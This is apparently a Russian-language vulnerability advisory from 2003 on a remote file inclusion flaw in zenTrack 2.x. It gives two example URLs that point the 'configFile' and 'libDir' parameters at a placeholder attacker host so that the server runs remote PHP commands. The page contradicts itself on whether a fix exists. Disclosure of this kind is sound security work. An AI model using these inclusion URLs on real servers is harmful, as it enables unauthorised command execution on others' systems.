Удаленное выполнение произвольных команд в zenTrack

Дата публикации:
11.06.2003
Всего просмотров:
15001
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
zenTrack 2.x
Описание: Уязвимость обнаружена в zenTrack. Удаленный пользователь может выполнить произвольные команды на системе. Удаленный пользователь может определить удаленное местоположение сценария 'header.php' в переменной '$configFile', чтобы выполнить произвольный PHP код на системе. Пример:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?cmd=pwd
Удаленный пользователь может также определить удаленное местоположение сценария 'translator.class' файла в '/test' каталоге на удаленном сервере в libDir переменной, чтобы выполнить произвольный PHP код на системе. Пример:
http://[victim]/zentrack/www/index.php?libDir=http://[attacker]/test/&cmd=p wd
Уязвимость обнаружена в zenTrack 2.4.1

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: zenTrack Remote Command Execution Vulnerabilities

или введите имя

CAPTCHA